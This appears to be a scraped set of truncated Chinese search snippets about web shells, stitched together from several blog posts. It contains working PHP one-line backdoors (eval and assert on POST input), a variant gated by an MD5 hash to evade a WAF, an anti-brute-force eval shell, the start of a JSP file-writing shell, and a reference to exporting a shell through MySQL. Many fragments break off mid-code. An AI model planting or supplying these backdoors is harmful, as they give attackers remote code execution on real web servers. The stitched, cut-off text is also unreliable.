1.mysql执行语句拿shell 2.利用md5绕过waf <?php if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){ assert($_POST['a']); } ?> ...

PHP一句话：1、普通一句话 <!--?php @eval($_POST['ki11']);?--> 2、防爆破一句话 <!--?php substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['ki11 ...

文章转载来源：https://blog.csdn.net/qq_38684504/article/details/90047213#1.%20bash%E7%9B%B4%E6%8E%A5%E5%8F%8D%E5%BC%B9 最开始的时候连shell具体是啥都不太清楚，记得有本书上封面画着个坐着 ...

很老的东西了，但是很多时候会派上用场 mysql一句话导出shell Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp ...

...

<?php @eval($_POST[pp]);?> 这是一段PHP木马代码，也就是我们所说的后门程序 为什么说这段代码是后门程序？ 其实这段代码属于基础类的一句话，功能仅限于验证漏洞了，实际中太容易被查出来了， 这个是PHP最常见的一句话木马的源码，通过post木马程序来实现 ...

eval 函数 eval() 函数把字符串按照 PHP 代码来计算 该字符串必须是合法的 PHP 代码，且必须以分号结尾 如果没有 ...

jsp一句话 <% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write ...